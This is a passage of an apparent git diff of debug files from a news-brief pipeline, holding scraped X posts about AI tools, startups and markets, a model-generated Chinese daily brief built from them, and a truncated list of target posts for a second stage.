"2026-04-28T22:26:54+00:00", "title": "我靠!兄弟们?Warp 都要开源了!\n\n官方宣布Warp 正式全面开源啦!🔥\n\n知名现代终端 + Agentic 开发环境 Warp 现在完全开源!\n\n• 代码、Roadmap、贡献流程全部开放\n• GitHub:https://github.com/warpdotdev/warp\n• Oz AI agents(GPT 驱动)负责 coding、planning、testing\n• OpenAI Devs 担任 founding sponsor\n\n开发者福音!\n欢迎社区一起共建下一代终端工具 🚀", "url": "https://x.com/berryxia/status/2049254052840812960"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-28T22:24:00+00:00", "title": "\"You cannot have only A players in every role, some functions are just there to keep the business running.\n\nBut you can build a team where the people you keep are the highest performers in those roles.\n\nA players thrive when surrounded by other strong performers, but they get dra", "url": "https://x.com/HarryStebbings/status/2049253323329704378"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:22:48+00:00", "title": "NVIDIA 重磅发布!🚀 \n\nNemotron 3 Nano Omni 多模态开源模型来了!\n\n🔥 30B 参数\n🔥 256K 超长上下文\n🔥 最高效开放多模态模型(语言+视觉+语音+视频+音频一体化)\n🔥 专为 subagents / Agentic 任务设计\n🔥 完全开源(权重 + 数据 + 配方),领跑多项榜单\n\n可通过 NVIDIA NIM API 免费试用!完美 powering 多代理工作流。", "url": "https://x.com/berryxia/status/2049253021159403786"}, {"handle": "svwang1", "name": "王川(硅谷)", "published_at": "2026-04-28T22:20:52+00:00", "title": "人写的文章像面条,再乱,最终还是可以梳理出头绪。ai 写的文章像一锅粥,最后不知所云。", "url": "https://x.com/svwang1/status/2049252535689757003"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:20:51+00:00", "title": "Apple Vision Pro “首次”用于真实手术!👀 世界首例白内障手术诞生!\n\n这里我补充一下其实AVP在几年前刚出来那会就已经有国内沈阳那边的医院用于做手术,国内北大好像也有并非首例!\n\n纽约 SightMD 眼科医生 Dr. Eric Rosenberg 使用 Apple Vision Pro + ScopeXR 混合现实平台,于2025年10月完成全球首例,至今已成功实施数百例。\n\n支持3D立体显微视野、实时数据叠加 + 远程专家协作,空间计算正式进入手术室!\n\n```", "url": "https://x.com/berryxia/status/2049252532015579248"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:13:55+00:00", "title": "R to @berryxia: huggingface.co/poolside/Lagu…", "url": "https://x.com/berryxia/status/2049250788422353142"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:13:37+00:00", "title": "前Github CTO team带着新模型来了!\n\n他们的Poolside AI 团队刚刚开源了他们的首个权重模型!\n\n模型名称 Laguna XS.2\n• 33B total / 3B active MoE\n• Apache 2.0 完全开源\n• 专为 Agentic Coding + 长时序任务设计\n• 单张 GPU 即可流畅运行\n\n同时发布 Laguna M.1(当前最强版)和 Agent Harness。\n\n由前 GitHub CTO Jason Warner 创立的团队,coding agent 赛道新力量!\n\n```", "url": "https://x.com/berryxia/status/2049250710492160228"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:10:16+00:00", "title": "🚀 视频模型其实早就懂3D了!\n\n微软World-R1用RL直接唤醒,无需改架构、无视频训练数据、无额外推理成本!\n\n1. 把相机轨迹嵌入扩散噪声,零额外模块\n\n2. 用Depth Anything 3 + Qwen3-VL做3D几何评判器\n\n3. 周期性解耦训练,建筑保持刚性、旗帜依然飘动\n\n4. 仅用3K条文本提示完成训练,效果惊人\n\n视频生成迈向真实世界模拟的关键一步!\n\n项目地址:\nhttps://github.com/microsoft/World-R1", "url": "https://x.com/berryxia/status/2049249868376604931"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:02:28+00:00", "title": "Claude 重磅连接创意专业工具!\n\n全新 Blender 和 Autodesk Fusion 连接器上线,通过对话直接调试场景、构建工具、修改3D模型,创意工作流直接搞起来!\n\n1. Blender 连接器:调试场景、批量应用变化、构建新工具,全在 Claude 中完成\n\n2. Autodesk Fusion 连接器:通过自然对话创建和修改3D模型,设计师和工程师效率拉满\n\n3.同日上线更多连接器:Adobe Creative Cloud、Ableton、Splice、Canva \nAffinity、SketchUp、Resolume\n\n4. 正式加", "url": "https://x.com/berryxia/status/2049247904536428805"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-28T21:46:18+00:00", "title": "Wow. Musk’s lawyers will capitalize on this.", "url": "https://x.com/GaryMarcus/status/2049243836359254025"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-28T21:44:35+00:00", "title": "From what I can tell, Elon Musk just stepped on his own toes at the trial, making it all about him instead of the promises Altman and Brockman broke.\n\nOpenAI will slay his ego on cross. \n\nHe should have made it about them.\n\n(reporting from @MikeIsaac at NYT)", "url": "https://x.com/GaryMarcus/status/2049243406380237116"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-28T21:37:05+00:00", "title": "Image", "url": "https://x.com/sama/status/2049241518540808440"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-28T21:36:28+00:00", "title": "RT by @ylecun: What a week at @iclr_conf in Rio 🇧🇷 !\n\nAs my first conference, it would have been hard to ask for a better experience 😍. I had the chance to present two papers:\n- EB-JEPA https://github.com/facebookresearch/eb_jepa: Presented as an Oral 🏅 (top ~3% of papers) at the", "url": "https://x.com/ylecun/status/2049241361266684288"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-28T21:21:16+00:00", "title": "I am worried by the constraining exit options for venture backed companies: \n\n1. IPOs: You can’t IPO with less than $500M in revenue and even then, it’s not a slam dunk. Everyone that has so far has been a s*** IPO. \n\n2. Acquisition by Incumbent: Yes but they are so specific. Ver", "url": "https://x.com/HarryStebbings/status/2049237538901020767"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-28T21:12:19+00:00", "title": "wow y'all love 5.5\n\nwe should think of something nice to do to celebrate!", "url": "https://x.com/sama/status/2049235284655780000"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-28T21:06:51+00:00", "title": "RT by @GaryMarcus: As an avid cyclist, I was amused to see ChatGPT's “powerful new image engine\" draw a bicycle with the \"brake\" label pointing to empty space where brakes are sometimes found on other bicycles. The point of these AI fails (regularly collected by @garymarcus) is n", "url": "https://x.com/GaryMarcus/status/2049233910266278250"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-28T20:39:11+00:00", "title": "We're in Stockholm. You know how there are some places where you think \"Nice place to visit, but I wouldn't want to live there\"? Stockholm is the kind of place that makes you want to live there.", "url": "https://x.com/paulg/status/2049226946471489602"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-28T20:35:56+00:00", "title": "There are some real bombshells in this one.", "url": "https://x.com/paulg/status/2049226128603172949"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-28T20:32:16+00:00", "title": "\"He just doesn't listen to me. Just like you.\"\n\n— Jessica on our younger son", "url": "https://x.com/paulg/status/2049225204132421727"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-28T20:31:00+00:00", "title": "Do the majority of company teams need to be rebuilt for the technology we have today?\n\n\"Yes, teams need to be rebuilt for the AI era.\n\nIf roles are going to be automated or not adapting fast enough, you have to redesign the org from scratch based on what is possible today.\n\nThe c", "url": "https://x.com/HarryStebbings/status/2049224886128722345"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-28T20:26:28+00:00", "title": "Image", "url": "https://x.com/pmarca/status/2049223746368483370"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-28T20:20:22+00:00", "title": "“YouTube videos about AI, but with no soyface”", "url": "https://x.com/pmarca/status/2049222212008206717"}, {"handle": "JeffDean", "name": "Jeff Dean", "published_at": "2026-04-28T20:16:21+00:00", "title": "Google Translate is turning 20! 🎉. There are 20 fun facts and tips in the thread below.\n\nTranslate is one of my favorite Google products because it brings us all closer together!\n\nI've been involved with a couple of things over the years. The first was our deployment of the initi", "url": "https://x.com/JeffDean/status/2049221200321380805"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:59:07+00:00", "title": "There are five things you can focus on in your life that will help you lead a balanced and fulfilling life.", "url": "https://x.com/jason/status/2049216863574364182"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:58:37+00:00", "title": "If you're feeling unbalanced in your life, I highly recommend checking in on my big five.", "url": "https://x.com/jason/status/2049216735912329567"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:55:41+00:00", "title": "We're all standing on the shoulders of Adam Curry and Dave Weiner.", "url": "https://x.com/jason/status/2049215999795138656"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:54:02+00:00", "title": "RT by @Jason: Peter Thiel: “We’ve tried to do too much investing in Europe. It’s always sort of a junket.”\n\n“It’s a nice place to go on vacation as an investor.”\n\n“It’s a very strange thing—the US is somehow still the country where people do new things.”\n\nVia @theallinpod", "url": "https://x.com/jason/status/2049215583351341460"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:52:16+00:00", "title": "AutoLane is my next uber.", "url": "https://x.com/jason/status/2049215140810072429"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:52:00+00:00", "title": "The future is autonomous, and auto lane is going to play a major role in managing autonomy for giant parking lots!\n\nHighly recommend listening to this podcast to understand what the future will look like.", "url": "https://x.com/jason/status/2049215070970814469"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:51:11+00:00", "title": "What album or two do you have in deep rotation at the moment?\n\nIt could be from the archives or it could be a brand new selection.", "url": "https://x.com/jason/status/2049214864912978399"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-28T19:48:10+00:00", "title": "RT by @charliebilello: Tomorrow's News Today...\n\nBREAKING: NO CHANGE. THE FED HOLDS INTEREST RATES STEADY AT 3.50-3.75%, CITING CONTINUED UNCERTAINTY OVER THE WAR IN IRAN AND ITS IMPACT ON ECONOMIC GROWTH AND INFLATION.", "url": "https://x.com/charliebilello/status/2049214106352107778"}] diff --git a/data/x_brief/debug/20260429_185943_l1_stage2_output.json b/data/x_brief/debug/20260429_185943_l1_stage2_output.json new file mode 100644 index 0000000..3de3930 --- /dev/null +++ b/data/x_brief/debug/20260429_185943_l1_stage2_output.json @@ -0,0 +1,267 @@ +{ + "raw_text": "\n\n{\"headline\":\"AI编程工具爆发:Warp开源、Cursor 3.2携GPT-5.5登场,Claude接 Blender MCP 打通创意工作流\",\"trending_keywords\":[\"Warp开源\",\"Cursor 3.2\",\"GPT-5.5\",\"Claude Blender MCP\",\"Nemotron 3 Nano\",\"Matt Pocock Skills\"],\"themes\":[{\"id\":\"t1\",\"title\":\"AI编程工具军备竞赛升级\",\"subtitle\":\"Warp开源、Cursor 3.2、Claude Code三路夹击,开发者工作流正在被重新定义\",\"priority\":\"P0\",\"bullets\":[\"Warp昨晚开源:AGPL协议,38k+星,定位ADE,内置Agent支持Claude Code/Codex/Gemini CLI\",\"Cursor 3.2发布:GPT-5.5强势入驻(CursorBench 72.8%),/multitask并行任务支持,多仓库workspace\"],\"samples\":[{\"text\":\"Warp开源38k+星,AGPL协议,定位ADE\",\"url\":\"https://github.com/warpdotdev/warp\",\"handle\":\"berryxia\",\"date\":\"2026-04-28\"},{\"text\":\"Cursor 3.2发布:GPT-5.5入驻\",\"url\":\"https://x.com/cursor_ai/status/2047744579127185843\",\"handle\":\"cursor_ai\",\"date\":\"2026-04-28\"}]},{\"id\":\"t2\",\"title\":\"Claude打通创意工具链\",\"subtitle\":\"Blender MCP上线+9个创意连接器,AI从代码生成延伸到3D设计和创意工作流\",\"priority\":\"P1\",\"bullets\":[\"Claude上线Blender MCP连接器:自然语言直接操控Blender Python API,批量改物体/调场景无需写代码\",\"Anthropic同时加入Blender基金会当赞助商\",\"同日上线Adobe Creative Cloud、Ableton、Canva等9个创意工具连接器\"],\"samples\":[{\"text\":\"Claude上线Blender MCP连接器\",\"url\":\"https://x.com/Pluvio9yte/status/2049403423813140571\",\"handle\":\"Pluvio9yte\",\"date\":\"2026-04-29\"},{\"text\":\"Claude打通创意工具链\",\"url\":\"https://x.com/berryxia/status/2049247904536428805\",\"handle\":\"berryxia\",\"date\":\"2026-04-28\"}]},{\"id\":\"t3\",\"title\":\"开源生态的冷数据:67,196个Agent项目分析\",\"subtitle\":\"Jason Zhu跑通全网Agent工具库,揭示极度不均衡的分布\",\"priority\":\"P1\",\"bullets\":[\"基尼系数0.983破纪录,54.1%项目0 star,Top1%占83% stars\",\"2026年3月单月新增27,720个项目,是2024年月均的45倍\",\"Matt Pocock开源Skill框架:16个工程师级实战技能,38K stars\"],\"samples\":[{\"text\":\"67,196个Agent项目分析\",\"url\":\"https://x.com/GoSailGlobal/status/2049415194372342164\",\"handle\":\"GoSailGlobal\",\"date\":\"2026-04-29\"},{\"text\":\"Matt Pocock Skills 38K stars\",\"url\":\"https://x.com/GoSailGlobal/status/2049339826877665496\",\"handle\":\"GoSailGlobal\",\"date\":\"2026-04-29\"}]}],\"p0_events\":[{\"id\":\"p01\",\"title\":\"OpenAI全系正式登陆AWS\",\"meta\":\"2026-04-29 | 来自@GoSailGlobal\",\"summary\":\"GPT + Codex + 托管Agent一并上线AWS,企业级AI服务再下一城\",\"url\":\"https://x.com/GoSailGlobal/status/2049327989951967546\"},{\"id\":\"p02\",\"title\":\"Nvidia发布Nemotron 3 Nano Omni\",\"meta\":\"2026-04-28 | 来自@berryxia\",\"summary\":\"30B参数多模态开源模型,256K上下文,专为subagents设计,完全开源\",\"url\":\"https://x.com/berryxia/status/2049253021159403786\"},{\"id\":\"p03\",\"title\":\"Anthropic拒接军方合作\",\"meta\":\"2026-04-29 | 来自@GoSailGlobal\",\"summary\":\"Google顺势签下五角大楼新合同,AI厂商在政府合同上分化\",\"url\":\"https://x.com/GoSailGlobal/status/2049327989951967546\"},{\"id\":\"p04\",\"title\":\"Claude Code系统提示Bug\",\"meta\":\"2026-04-29 | 来自@GoSailGlobal\",\"summary\":\"托管Agent失效+用户token被空转烧光,需关注\",\"url\":\"https://x.com/GoSailGlobal/status/2049327989951967546\"},{\"id\":\"p05\",\"title\":\"美联储维持利率3.50-3.75%\",\"meta\":\"2026-04-28 | 来自@charliebilello\",\"summary\":\"伊朗战争影响经济和通胀预期,利率决策观望\",\"url\":\"https://x.com/charliebilello/status/2049214106352107778\"},{\"id\":\"p06\",\"title\":\"Perplexity全面切换GPT-5.5\",\"meta\":\"2026-04-24 | 来自@AravSrinivas\",\"summary\":\"GPT-5.5作为默认orchestrator模型,性能和成本优化\",\"url\":\"https://x.com/AravSrinivas/status/2047753276888854595\"}],\"top_quotes\":[{\"id\":\"q1\",\"quote\":\"feels like a good time to seriously rethink how operating systems and user interfaces are designed\",\"speaker\":\"Sam Altman\",\"date\":\"2026-04-26\",\"note\":\"对OS和UI设计的反思,暗示AI将改变人机交互范式\",\"url\":\"https://x.com/sama/status/2048428561481265539\"},{\"id\":\"q2\",\"quote\":\"Warp 不只是个终端,定位是 ADE(Agentic Development Environment)\",\"speaker\":\"泊舟\",\"date\":\"2026-04-29\",\"note\":\"Warp开源定位解读,AGPL防白嫖\",\"url\":\"https://x.com/bozhou_ai/status/2049436870963085429\"},{\"id\":\"q3\",\"quote\":\"The real issue is culture and talent quality, and fixing that usually requires a full rebuild\",\"speaker\":\"Harry Stebbings\",\"date\":\"2026-04-29\",\"note\":\"关于AI时代团队重建的洞见,裁员不能解决文化问题\",\"url\":\"https://x.com/HarryStebbings/status/2049298621951058341\"}],\"category_updates\":[{\"id\":\"c1\",\"title\":\"开源工具爆发\",\"subtitle\":\"Warp开源+Matt Pocock Skills+Poolside Laguna\",\"level\":\"P0\",\"items\":[{\"text\":\"Warp开源38k+星,AGPL协议\",\"url\":\"https://github.com/warpdotdev/warp\"},{\"text\":\"Matt Pocock Skills 38K stars\",\"url\":\"https://github.com/mattpocock/skills\"},{\"text\":\"前GitHub CTO团队Poolside开源Laguna\",\"url\":\"https://x.com/berryxia/status/2049250710492160228\"}]},{\"id\":\"c2\",\"title\":\"AI编程工具更新\",\"subtitle\":\"Cursor 3.2 + Claude Code + Codex\",\"level\":\"P0\",\"items\":[{\"text\":\"Cursor 3.2: GPT-5.5入驻,/multitask并行\",\"url\":\"https://x.com/cursor_ai/status/2047744579127185843\"},{\"text\":\"Codex获Sam Altman点赞\\\"escape velocity\\\"\",\"url\":\"https://x.com/GoSailGlobal/status/2049327989951967546\"}]},{\"id\":\"c3\",\"title\":\"3D/创意工作流\",\"subtitle\":\"Claude Blender MCP + SATO网格生成\",\"level\":\"P1\",\"items\":[{\"text\":\"Claude接Blender等9个创意工具\",\"url\":\"https://x.com/berryxia/status/2049247904536428805\"},{\"text\":\"SATO: 3D网格生成重磅突破\",\"url\":\"https://x.com/berryxia/status/2049255217603178794\"}]},{\"id\":\"c4\",\"title\":\"大模型进展\",\"subtitle\":\"Nvidia Nemotron + MiniCPM-o 4.5\",\"level\":\"P1\",\"items\":[{\"text\":\"Nemotron 3 Nano 30B多模态开源\",\"url\":\"https://x.com/berryxia/status/2049253021159403786\"},{\"text\":\"MiniCPM-o 4.5: 边缘AI突破\",\"url\":\"https://x.com/berryxia/status/2049274065610027362\"}]},{\"id\":\"c5\",\"title\":\"宏观与能源\",\"subtitle\":\"伊朗战争对能源价格的影响\",\"level\":\"P1\",\"items\":[{\"text\":\"Jet Fuel +70%, 原油+48-52%, 化肥+23%\",\"url\":\"https://x.com/charliebilello/status/2049298490489004357\"}]},{\"id\":\"c6\",\"title\":\"华语圈热点\",\"subtitle\":\"小米送token、联通查PCDN\",\"level\":\"P2\",\"items\":[{\"text\":\"小米百万亿token补贴\",\"url\":\"https://x.com/realNyarime/status/2049296454905393361\"},{\"text\":\"长沙联通上门查PCDN\",\"url\":\"https://x.com/realNyarime/status/2049408651660755063\"}]}],\"risk_signals\":[{\"id\":\"r1\",\"level\":\"HIGH\",\"title\":\"Claude Code系统提示Bug\",\"detail\":\"托管Agent失效+用户token被空转烧光,使用Claude Code需留意\",\"url\":\"https://x.com/GoSailGlobal/status/2049327989951967546\"},{\"id\":\"r2\",\"level\":\"MID\",\"title\":\"Anthropic与军方合作分歧\",\"detail\":\"Anthropic拒接军方合作,Google签下五角大楼合同,AI厂商在政府合同上分化,可能影响未来市场格局\",\"url\":\"https://x.com/GoSailGlobal/status/2049327989951967546\"},{\"id\":\"r3\",\"level\":\"OPP\",\"title\":\"AI安全争议持续\",\"detail\":\"Gary Marcus持续质疑AI公司,OpenAI庭审中Musk与Altman矛盾公开化\",\"url\":\"https://x.com/GaryMarcus/status/2049243406380237116\"},{\"id\":\"r4\",\"level\":\"MID\",\"title\":\"美股估值与退出困境\",\"detail\":\"Harry Stebbings警示 VC支持的科技创新公司 IPO门槛高(需5亿收入),退出选项有限\",\"url\":\"https://x.com/HarryStebbings/status/2049237538901020767\"},{\"id\":\"r5\",\"level\":\"WARN\",\"title\":\"美国房价增速放缓\",\"detail\":\"全美房价同比仅增0.7%(2023年6月以来最慢),卖家数量创纪录 比买家多46%,若无政府干预价格将下行\",\"url\":\"https://x.com/charliebilello/status/2049306480071873011\"},{\"id\":\"r6\",\"level\":\"MID\",\"title\":\"开源bot的护城河危机\",\"detail\":\"Leo:AI时代护城河从\\\"代码会写\\\"变成\\\"策略会想\\\",以前两个月重写架构变成两小时\",\"url\":\"https://x.com/runes_leo/status/2049311708330459226\"}]}", + "parsed_modules": { + "headline": "AI编程工具爆发:Warp开源、Cursor 3.2携GPT-5.5登场,Claude接 Blender MCP 打通创意工作流", + "trending_keywords": [ + "Warp开源", + "Cursor 3.2", + "GPT-5.5", + "Claude Blender MCP", + "Nemotron 3 Nano", + "Matt Pocock Skills" + ], + "themes": [ + { + "id": "t1", + "title": "AI编程工具军备竞赛升级", + "subtitle": "Warp开源、Cursor 3.2、Claude Code三路夹击,开发者工作流正在被重新定义", + "priority": "P0", + "bullets": [ + "Warp昨晚开源:AGPL协议,38k+星,定位ADE,内置Agent支持Claude Code/Codex/Gemini CLI", + "Cursor 3.2发布:GPT-5.5强势入驻(CursorBench 72.8%),/multitask并行任务支持,多仓库workspace" + ], + "samples": [ + { + "text": "Warp开源38k+星,AGPL协议,定位ADE", + "url": "https://github.com/warpdotdev/warp", + "handle": "berryxia", + "date": "2026-04-28" + }, + { + "text": "Cursor 3.2发布:GPT-5.5入驻", + "url": "https://x.com/cursor_ai/status/2047744579127185843", + "handle": "cursor_ai", + "date": "2026-04-28" + } + ] + }, + { + "id": "t2", + "title": "Claude打通创意工具链", + "subtitle": "Blender MCP上线+9个创意连接器,AI从代码生成延伸到3D设计和创意工作流", + "priority": "P1", + "bullets": [ + "Claude上线Blender MCP连接器:自然语言直接操控Blender Python API,批量改物体/调场景无需写代码", + "Anthropic同时加入Blender基金会当赞助商", + "同日上线Adobe Creative Cloud、Ableton、Canva等9个创意工具连接器" + ], + "samples": [ + { + "text": "Claude上线Blender MCP连接器", + "url": "https://x.com/Pluvio9yte/status/2049403423813140571", + "handle": "Pluvio9yte", + "date": "2026-04-29" + }, + { + "text": "Claude打通创意工具链", + "url": "https://x.com/berryxia/status/2049247904536428805", + "handle": "berryxia", + "date": "2026-04-28" + } + ] + }, + { + "id": "t3", + "title": "开源生态的冷数据:67,196个Agent项目分析", + "subtitle": "Jason Zhu跑通全网Agent工具库,揭示极度不均衡的分布", + "priority": "P1", + "bullets": [ + "基尼系数0.983破纪录,54.1%项目0 star,Top1%占83% stars", + "2026年3月单月新增27,720个项目,是2024年月均的45倍", + "Matt Pocock开源Skill框架:16个工程师级实战技能,38K stars" + ], + "samples": [ + { + "text": "67,196个Agent项目分析", + "url": "https://x.com/GoSailGlobal/status/2049415194372342164", + "handle": "GoSailGlobal", + "date": "2026-04-29" + }, + { + "text": "Matt Pocock Skills 38K stars", + "url": "https://x.com/GoSailGlobal/status/2049339826877665496", + "handle": "GoSailGlobal", + "date": "2026-04-29" + } + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "OpenAI全系正式登陆AWS", + "meta": "2026-04-29 | 来自@GoSailGlobal", + "summary": "GPT + Codex + 托管Agent一并上线AWS,企业级AI服务再下一城", + "url": "https://x.com/GoSailGlobal/status/2049327989951967546" + }, + { + "id": "p02", + "title": "Nvidia发布Nemotron 3 Nano Omni", + "meta": "2026-04-28 | 来自@berryxia", + "summary": "30B参数多模态开源模型,256K上下文,专为subagents设计,完全开源", + "url": "https://x.com/berryxia/status/2049253021159403786" + }, + { + "id": "p05", + "title": "美联储维持利率3.50-3.75%", + "meta": "2026-04-28 | 来自@charliebilello", + "summary": "伊朗战争影响经济和通胀预期,利率决策观望", + "url": "https://x.com/charliebilello/status/2049214106352107778" + }, + { + "id": "p06", + "title": "Perplexity全面切换GPT-5.5", + "meta": "2026-04-24 | 来自@AravSrinivas", + "summary": "GPT-5.5作为默认orchestrator模型,性能和成本优化", + "url": "https://x.com/AravSrinivas/status/2047753276888854595" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "feels like a good time to seriously rethink how operating systems and user interfaces are designed", + "speaker": "Sam Altman", + "date": "2026-04-26", + "note": "对OS和UI设计的反思,暗示AI将改变人机交互范式", + "url": "https://x.com/sama/status/2048428561481265539" + }, + { + "id": "q2", + "quote": "Warp 不只是个终端,定位是 ADE(Agentic Development Environment)", + "speaker": "泊舟", + "date": "2026-04-29", + "note": "Warp开源定位解读,AGPL防白嫖", + "url": "https://x.com/bozhou_ai/status/2049436870963085429" + }, + { + "id": "q3", + "quote": "The real issue is culture and talent quality, and fixing that usually requires a full rebuild", + "speaker": "Harry Stebbings", + "date": "2026-04-29", + "note": "关于AI时代团队重建的洞见,裁员不能解决文化问题", + "url": "https://x.com/HarryStebbings/status/2049298621951058341" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "开源工具爆发", + "subtitle": "Warp开源+Matt Pocock Skills+Poolside Laguna", + "level": "P0", + "items": [ + { + "text": "Matt Pocock Skills 38K stars", + "url": "https://github.com/mattpocock/skills" + }, + { + "text": "前GitHub CTO团队Poolside开源Laguna", + "url": "https://x.com/berryxia/status/2049250710492160228" + } + ] + }, + { + "id": "c2", + "title": "AI编程工具更新", + "subtitle": "Cursor 3.2 + Claude Code + Codex", + "level": "P0", + "items": [] + }, + { + "id": "c3", + "title": "3D/创意工作流", + "subtitle": "Claude Blender MCP + SATO网格生成", + "level": "P1", + "items": [ + { + "text": "SATO: 3D网格生成重磅突破", + "url": "https://x.com/berryxia/status/2049255217603178794" + } + ] + }, + { + "id": "c4", + "title": "大模型进展", + "subtitle": "Nvidia Nemotron + MiniCPM-o 4.5", + "level": "P1", + "items": [ + { + "text": "MiniCPM-o 4.5: 边缘AI突破", + "url": "https://x.com/berryxia/status/2049274065610027362" + } + ] + }, + { + "id": "c5", + "title": "宏观与能源", + "subtitle": "伊朗战争对能源价格的影响", + "level": "P1", + "items": [ + { + "text": "Jet Fuel +70%, 原油+48-52%, 化肥+23%", + "url": "https://x.com/charliebilello/status/2049298490489004357" + } + ] + }, + { + "id": "c6", + "title": "华语圈热点", + "subtitle": "小米送token、联通查PCDN", + "level": "P2", + "items": [ + { + "text": "小米百万亿token补贴", + "url": "https://x.com/realNyarime/status/2049296454905393361" + }, + { + "text": "长沙联通上门查PCDN", + "url": "https://x.com/realNyarime/status/2049408651660755063" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "Claude Code系统提示Bug", + "detail": "托管Agent失效+用户token被空转烧光,使用Claude Code需留意", + "url": "https://x.com/GoSailGlobal/status/2049327989951967546" + }, + { + "id": "r2", + "level": "MID", + "title": "Anthropic与军方合作分歧", + "detail": "Anthropic拒接军方合作,Google签下五角大楼合同,AI厂商在政府合同上分化,可能影响未来市场格局", + "url": "https://x.com/GoSailGlobal/status/2049327989951967546" + }, + { + "id": "r3", + "level": "OPP", + "title": "AI安全争议持续", + "detail": "Gary Marcus持续质疑AI公司,OpenAI庭审中Musk与Altman矛盾公开化", + "url": "https://x.com/GaryMarcus/status/2049243406380237116" + }, + { + "id": "r4", + "level": "MID", + "title": "美股估值与退出困境", + "detail": "Harry Stebbings警示 VC支持的科技创新公司 IPO门槛高(需5亿收入),退出选项有限", + "url": "https://x.com/HarryStebbings/status/2049237538901020767" + }, + { + "id": "r5", + "level": "WARN", + "title": "美国房价增速放缓", + "detail": "全美房价同比仅增0.7%(2023年6月以来最慢),卖家数量创纪录 比买家多46%,若无政府干预价格将下行", + "url": "https://x.com/charliebilello/status/2049306480071873011" + }, + { + "id": "r6", + "level": "MID", + "title": "开源bot的护城河危机", + "detail": "Leo:AI时代护城河从\"代码会写\"变成\"策略会想\",以前两个月重写架构变成两小时", + "url": "https://x.com/runes_leo/status/2049311708330459226" + } + ] + } +} \ No newline at end of file diff --git a/data/x_brief/debug/20260429_190051_l2_input.json b/data/x_brief/debug/20260429_190051_l2_input.json new file mode 100644 index 0000000..3b683f4 --- /dev/null +++ b/data/x_brief/debug/20260429_190051_l2_input.json @@ -0,0 +1,42 @@ +{ + "target_indexes": [ + 445, + 16, + 97, + 9, + 38 + ], + "target_count": 5, + "targets": [ + { + "idx": 445, + "handle": "cursor_ai", + "url": "https://x.com/cursor_ai/status/2047744579127185843", + "title": "GPT-5.5 is now available in Cursor!\n\nIt's currently the top model on CursorBench at 72.8%.\n\nWe've partnered with OpenAI to offer it for 50% off through May 2." + }, + { + "idx": 16, + "handle": "Pluvio9yte", + "url": "https://x.com/Pluvio9yte/status/2049403423813140571", + "title": "兄弟们,搞3D的直接冲🤩🤩🤩\n\nClaude上线了Blender MCP连接器,\n自然语言直接操控Blender的Python API,\n调场景、批量改物体、写自定义工具,不用会一行代码,\n\n我之前在Blender写个批量脚本至少折腾半小时,\n现在一句话就搞定了,\n\n更狠的是Anthropic同时砸钱加入了Blender基金会当赞助商,\n这波是总共9个创意工具连接器一起上线" + }, + { + "idx": 97, + "handle": "berryxia", + "url": "https://x.com/berryxia/status/2049247904536428805", + "title": "Claude 重磅连接创意专业工具!\n\n全新 Blender 和 Autodesk Fusion 连接器上线,通过对话直接调试场景、构建工具、修改3D模型,创意工作流直接搞起来!\n\n1. Blender 连接器:调试场景、批量应用变化、构建新工具,全在 Claude 中完成\n\n2. Autodesk Fusion 连接器:通过自然对话创建和修改3D模型,设计师和工程师效率拉满\n\n3.同日上线更多连接器:Adobe Creative Cloud、Ableton、Splice、Canva \nAffinity、SketchUp、Resolume\n\n4. 正式加入 Blender Development Fund,支持开源 3D 软件发展\n\n创意工作者和 3D/设计/音乐/视频玩家,这波更新太香了!" + }, + { + "idx": 9, + "handle": "GoSailGlobal", + "url": "https://x.com/GoSailGlobal/status/2049415194372342164", + "title": "做了 2 个月的事:把 GitHub 上每一个 Claude Skill / MCP server / 开源 Agent 工具都索引下来\n\n数据库现在 67,196 个项目\n\n跑了一遍分布分析,结果让我自己愣了 30 秒:\n\n- 基尼系数 0.983(破 AppStore、npm、YouTube 纪录)\n- 54.1% 的项目是 0 star——不是「少 star」,是 0\n- Top 1% 占走了 83% 的 stars\n- 2026 年 3 月单月新增 27,720 个项目,是 2024 月均的 45 倍\n\n写了一篇 1800 字英文长文讲完所有发现,含 3 个我自己当初判断错的事。\n\nhttp://dev.to/gosailglobal/i-indexed-67000-open-source-ai-agent-projects-heres-whats-actually-inside-edg\n\n完整数据 + 12 章免费书:\n1️⃣ http://agentskillshub.top\n2️⃣ https://github.com/zhuyansen/skill-blue-book" + }, + { + "idx": 38, + "handle": "GoSailGlobal", + "url": "https://x.com/GoSailGlobal/status/2049339826877665496", + "title": "Matt 